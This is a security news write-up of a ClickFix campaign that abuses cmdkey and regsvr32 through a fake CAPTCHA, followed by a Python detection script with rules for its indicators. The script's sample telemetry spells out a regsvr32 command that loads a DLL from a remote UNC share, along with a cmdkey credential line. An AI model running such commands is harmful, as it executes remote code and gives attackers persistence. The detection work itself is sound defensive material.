
New ClickFix Attack Hides in Native Windows Tools to Reduce Detection Risk
Why It Matters
The technique demonstrates how attackers can exploit trusted Windows binaries to evade detection, raising the bar for endpoint security and user awareness. Organizations must adapt defenses to monitor LOLBin abuse and reinforce safe user behavior.
Key Takeaways
- Attack uses cmdkey and regsvr32 instead of PowerShell
- Fake CAPTCHA prompts users to run a single command via Win+R
- Malicious DLL fetched from a UNC path registers a scheduled task
- Task named RunNotepadNow disguises persistence as an ordinary process
- Researchers advise never copy-pasting code into the Windows Run dialog
Pulse Analysis
The ClickFix method has matured from simple phishing lures to sophisticated abuse of Windows "living‑off‑the‑land" binaries (LOLBins). By embedding malicious commands in a seemingly innocuous CAPTCHA dialog, threat actors capitalize on user trust and the built‑in legitimacy of utilities like cmdkey and regsvr32. This shift reflects a broader trend where attackers sidestep traditional detection signatures, opting for native tools that blend into normal system activity.
In this April 2026 campaign, the malicious command initiates a UNC connection to 151.245.195.142, pulls a 64‑bit DLL named demo.dll, and invokes DllRegisterServer to spawn a hidden CreateProcessA call. The DLL then creates a scheduled task—RunNotepadNow—using an XML payload hosted remotely. Because the task definition is not stored locally, defenders cannot rely on static file hashes, and the task’s benign name further obscures its malicious intent. The use of regsvr32 to load the DLL sidesteps PowerShell logging, making behavioral analytics more challenging.
For security teams, the key takeaway is the necessity of monitoring LOLBin activity and scrutinizing anomalous Run dialog inputs. Endpoint detection platforms should flag unusual cmdkey or regsvr32 invocations, especially those combined with network calls to unknown IPs. User education remains critical: employees must be instructed never to paste code from unverified sources into the Run box. As attackers continue to weaponize native Windows components, a layered defense—combining technical controls with awareness training—will be essential to mitigate this evolving threat vector.
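As an added example (not code from the article or from the researchers it cites), the following Python sketch turns the detection advice above into rules that run over process-creation and task-creation telemetry. The event lines are constructed for this example in a simplified key=value form; the IP address, demo.dll and the RunNotepadNow task name are the indicators the article reports, while the share name, user, password, benign events and the assumption that cmdkey was used with /add for a bare IP are placeholders and assumptions of this example. It also assumes that a command pasted into Win+R is spawned under explorer.exe, which is how the Run dialog launches processes.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample telemetry (not real logs) in a simplified key=value form
# modelled on process-creation (EventID=1) and task-creation (EventID=4698)
# events. The IP, DLL name and task name are the indicators from the article;
# share name, user, password and the benign events are made up for this example.
SAMPLE_EVENTS = [
    r'EventID=1 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\cmdkey.exe '
    r'CommandLine="cmdkey /add:151.245.195.142 /user:PLACEHOLDER /pass:PLACEHOLDER"',
    r'EventID=1 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\regsvr32.exe '
    r'CommandLine="regsvr32 /s \\151.245.195.142\share\demo.dll"',
    r'EventID=4698 TaskName=\RunNotepadNow',
    r'EventID=1 ParentImage=C:\Windows\System32\msiexec.exe Image=C:\Windows\System32\regsvr32.exe '
    r'CommandLine="regsvr32 /s C:\Program Files\Vendor\plugin.dll"',
    r'EventID=1 ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\cmdkey.exe '
    r'CommandLine="cmdkey /list"',
]

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
UNC_HOST_RE = re.compile(r'\\\\([^\\\s"]+)\\')          # \\host\share\...
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
TASK_NAME_IOCS = {"runnotepadnow"}      # task name reported for this campaign
RUN_DIALOG_PARENT = "explorer.exe"      # assumption: Win+R spawns its child under explorer.exe


@dataclass
class Finding:
    rule: str
    severity: str
    event: Dict[str, str]


def parse_event(line: str) -> Dict[str, str]:
    """Parse one key=value line; values containing spaces are double-quoted."""
    return {key: quoted or bare for key, quoted, bare in KV_RE.findall(line)}


def basename(path: str) -> str:
    """Last path component, lower-cased, so image and task names compare cleanly."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev: Dict[str, str]) -> List[Finding]:
    """Apply the LOLBin rules suggested by the article to a single parsed event."""
    findings: List[Finding] = []
    if ev.get("EventID") == "1":                         # process creation
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        # regsvr32 loading a DLL from a UNC path: the delivery step the article describes
        if image == "regsvr32.exe" and UNC_HOST_RE.search(cmd):
            findings.append(Finding("regsvr32_unc_dll", "high", ev))
        # cmdkey storing credentials for a bare IP (assumed use of cmdkey in this chain)
        if image == "cmdkey.exe" and "/add" in cmd.lower() and IPV4_RE.search(cmd):
            findings.append(Finding("cmdkey_add_remote_ip", "medium", ev))
        # either LOLBin spawned straight from the shell, as a pasted Run command would be
        if image in ("regsvr32.exe", "cmdkey.exe") and parent == RUN_DIALOG_PARENT:
            findings.append(Finding("lolbin_from_run_dialog", "medium", ev))
    elif ev.get("EventID") == "4698":                    # scheduled task created
        if basename(ev.get("TaskName", "")) in TASK_NAME_IOCS:
            findings.append(Finding("scheduled_task_ioc_name", "high", ev))
    return findings


def detect(lines: List[str]) -> List[Finding]:
    """Run every rule over a batch of raw event lines."""
    findings: List[Finding] = []
    for line in lines:
        findings.extend(evaluate(parse_event(line)))
    return findings


def chain_hosts(findings: List[Finding]) -> List[str]:
    """Hosts seen in both a cmdkey /add and a regsvr32 UNC load: the two-step
    chain from the article, worth escalating as a single incident."""
    cmdkey_hosts, unc_hosts = set(), set()
    for f in findings:
        cmd = f.event.get("CommandLine", "")
        if f.rule == "cmdkey_add_remote_ip":
            cmdkey_hosts.update(IPV4_RE.findall(cmd))
        elif f.rule == "regsvr32_unc_dll":
            unc_hosts.add(UNC_HOST_RE.search(cmd).group(1))
    return sorted(cmdkey_hosts & unc_hosts)


if __name__ == "__main__":
    results = detect(SAMPLE_EVENTS)
    for f in results:
        print(f"[{f.severity}] {f.rule}: {f.event.get('CommandLine') or f.event.get('TaskName')}")
    print("chained hosts:", chain_hosts(results))
```

On the constructed sample the two benign events (a vendor installer registering a local DLL, and `cmdkey /list` from a console) produce no findings, while the three campaign-style events produce five, and `chain_hosts` ties the cmdkey and regsvr32 activity to the same remote host. In production the task-name match is the weakest rule, since the name is trivially changed; the UNC-path regsvr32 load and the LOLBin-from-explorer heuristic are the ones to keep regardless of the indicator set.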